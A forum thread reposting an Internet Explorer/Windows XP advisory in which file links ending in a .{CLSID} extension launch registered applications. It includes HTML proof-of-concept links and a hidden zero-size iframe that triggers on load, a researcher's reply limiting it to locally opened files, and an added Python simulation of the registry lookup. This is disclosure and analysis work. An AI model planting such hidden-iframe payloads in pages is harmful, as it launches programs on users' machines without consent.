toska

advisory#5
/---------------------------------------------------------------------------/


Vendor: Microsoft Corp.
Product: Windows XP
Test machine: WinXP Pro Ed., IE 6 (fully patched)
Discovery by: Roozbeh Afrasiabi (roozbeh_afrasiabi(at)yahoo(dot)com)
Title: Internet Explorer .clsid vulnerability
Local: yes
/---------------------------------------------------------------------------/


TABLE OF CONTENTS:
==================

Description..............................................1

POC......................................................2

Contact info.............................................3

Disclaimer...............................................4


1)Description
================

CLSIDs are used by Windows and other MS products in many different
ways; these CLSIDs are linked to folders, applications, files, ...

When CLSIDs that are linked to executables are used as the extension
of existing or non-existing files in HTML pages, Internet Explorer
would execute the application linked to these CLSIDs. In addition,
existing files with CLSIDs linked to apps would execute too when they
are accessed directly.


2)POC
================


<!-- Link to a file that does not exist; its "extension" is the CLSID of an
     application registered with a LocalServer32 entry (NetMeeting conf.exe
     on the test machine, see the registry trace quoted below). -->
<a href="Roozbeh.{3E9BAF2D-7A79-11d2-9334-0000F875AE17}">does not exist!</a>

<!-- No base name at all, only the CLSID "extension". -->
<a href=".{3E9BAF2D-7A79-11d2-9334-0000F875AE17}">does not exist!</a>

<!-- Another CLSID whose LocalServer32 points at an installed application. -->
<a href=".{FB7199AB-79BF-11d2-8D94-0000F875C541}">does not exist!</a>

<!-- Same trigger with no click required: a hidden iframe requests the path
     as soon as the page loads. -->
<iframe id="Target" width="0" height="0" src=".{3E9BAF2D-7A79-11d2-9334-0000F875AE17}"
name="Target" scrolling="yes">
</iframe>





3)Contact Info
==================

(roozbeh_afrasiabi(at)yahoo(dot)com)
(da_stone_cold_killer(at)yahoo(dot)com)
qcred11
This is a nice one. Thanks
qcred11
This is interesting...


QUOTE


This is actually a behavior that is part of Windows Explorer, not
Internet Explorer. I think we have covered this in the past on lists as
well. If it is not already documented somewhere it should be, as this is
how Windows file queries (inside IE) are performed on the local file
system.

Basically, you must first circumvent security zone restrictions and gain
access to execute HTML files from the local file system in the first
place before this is an issue. At this time, it is much more interesting
to use your newly gained privileges to plant an EXE file and execute it
instead of just launching the already installed applications.

When your HTML document is opened from the local file system, its
working directory is C:\DIR\test.html (equivalent to the URL
FILE://C:/DIR/test.html). If you click on a link to "XX" from here or
have it open automatically through an iframe, the browser asks for
FILE://C:/DIR/XX ("XX" through the FILE protocol from the C:/ host in
the DIR directory).

In this case, we are asking the browser to retrieve
"FILE://C:/DIR/Roozbeh.{3E9BAF2D-7A79-11d2-9334-0000F875AE17}". IE
queries HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints\C
to see if the host is known (btw, all temporary NetBIOS sessions are
stored here as integers; my currently open share in the dirty network
to \\someserver\c$ is labelled 6 instead of C). It then checks both
HKCU and HKCR in order for instances of that GUID and eventually finds
"C:\PROGRA~1\NETMEE~1\conf.exe" in
HKCR\CLSID\{3E9BAF2D-7A79-11d2-9334-0000F875AE17}\LocalServer32\(Default),
which it then launches.

You can see this entire registry brawl at
http://jscript.dk/2004/5/clsid.regmon.log

If you try to test your POC from an Internet or Intranet site you will
see that the browser simply asks for a document on the server and in
return gets a 404 Not Found.


Regards

Thor Larholm
Senior Security Researcher
PivX Solutions
24 Corporate Plaza #180
Newport Beach, CA 92660
http://www.pivx.com
thor@pivx.com

chris105
So this isn't very useful then by the looks of things, ah well, thanks for posting anyway. Am I right in saying you need someone to run the .html by double clicking it and not just viewing the web page?
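The following Python is an added example, not code from the advisory, from Thor Larholm's reply, or from his regmon log. It models the two things the thread settles on: the resolution path described in the reply (document URL + href, then the trailing .{CLSID} of the file name, then a LocalServer32 lookup in HKCU and HKCR), and the answer to chris105's question (only a file: document makes the lookup happen; from an http: document the same href is simply requested from the server). The registry is a constructed in-memory snapshot: the NetMeeting conf.exe entry and its HKCR\CLSID\{GUID}\LocalServer32 key path are the ones named in the reply, while the HKCU\Software\Classes path, the usertool.exe entry and the InprocServer32-only entry are assumptions added to exercise the other branches.

```python
import re
from urllib.parse import urljoin, urlsplit, unquote

# Constructed registry snapshot (not a real hive). Only the NetMeeting entry
# is taken from the thread; the other entries and the HKCU\Software\Classes
# key path are assumptions used to show the remaining branches of the lookup.
REGISTRY = {
    "HKCU": {
        r"Software\Classes\CLSID\{11111111-1111-1111-1111-111111111111}\LocalServer32":
            r"C:\Tools\usertool.exe",
    },
    "HKCR": {
        r"CLSID\{3E9BAF2D-7A79-11d2-9334-0000F875AE17}\LocalServer32":
            r"C:\PROGRA~1\NETMEE~1\conf.exe",
        # An in-process server is a DLL, not a process to launch.
        r"CLSID\{22222222-2222-2222-2222-222222222222}\InprocServer32":
            r"C:\WINDOWS\system32\example.dll",
    },
}

# A trailing ".{8-4-4-4-12 hex}" on the last path component.
GUID_EXT = re.compile(
    r"\.(\{[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\})$")


def clsid_from_url(url):
    """Return the {CLSID} if url is a file: URL whose file name ends in .{CLSID}.

    Any other scheme returns None: the request leaves the machine and the
    server answers with whatever it has (a 404 in the thread's test).
    """
    parts = urlsplit(url)
    if parts.scheme.lower() != "file":
        return None
    name = unquote(parts.path).rsplit("/", 1)[-1]
    m = GUID_EXT.search(name)
    return m.group(1) if m else None


def lookup_local_server(clsid, registry=REGISTRY):
    """Find a LocalServer32 default value, checking HKCU before HKCR.

    Registry key names are case-insensitive, so compare lower-cased.
    """
    candidates = (
        ("HKCU", r"Software\Classes\CLSID\%s\LocalServer32" % clsid),
        ("HKCR", r"CLSID\%s\LocalServer32" % clsid),
    )
    for hive, wanted in candidates:
        for key, value in registry[hive].items():
            if key.lower() == wanted.lower():
                return hive, value
    return None


def what_happens(base_url, href, registry=REGISTRY):
    """Model the browser's handling of a link or iframe target.

    Returns ("fetch", url) for an ordinary request, ("launch", command) when
    a local .{CLSID} path resolves to an executable, and ("no-handler", url)
    when the extension looks like a CLSID but no LocalServer32 is registered.
    """
    url = urljoin(base_url, href)
    clsid = clsid_from_url(url)
    if clsid is None:
        return ("fetch", url)
    hit = lookup_local_server(clsid, registry)
    if hit is None:
        return ("no-handler", url)
    return ("launch", hit[1])


def launchable_clsids(registry=REGISTRY):
    """Audit helper: every CLSID in the snapshot that carries a LocalServer32."""
    found = {}
    for hive in ("HKCU", "HKCR"):
        for key, value in registry[hive].items():
            parts = key.split("\\")
            if parts[-1].lower() == "localserver32":
                found.setdefault(parts[-2], (hive, value))
    return found


if __name__ == "__main__":
    doc_local = "file:///C:/DIR/test.html"
    doc_remote = "http://www.example.com/DIR/test.html"
    for base, href in (
        (doc_local, "Roozbeh.{3E9BAF2D-7A79-11d2-9334-0000F875AE17}"),
        (doc_local, ".{3E9BAF2D-7A79-11d2-9334-0000F875AE17}"),
        (doc_local, ".{22222222-2222-2222-2222-222222222222}"),
        (doc_remote, "Roozbeh.{3E9BAF2D-7A79-11d2-9334-0000F875AE17}"),
    ):
        print(base, href, "->", what_happens(base, href))
    print("launchable:", launchable_clsids())
```

On a real XP box the dictionary would be replaced by reads of the default value under HKCR\CLSID\{GUID}\LocalServer32 (and the per-user classes key), and the regmon log linked in the reply is the ground truth for the exact key order; the point of the model is that the http: case never reaches the registry at all, which is why the POC only matters once an HTML file is already being opened from the local file system.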
Invision Power Board © 2001-2005 Invision Power Services, Inc.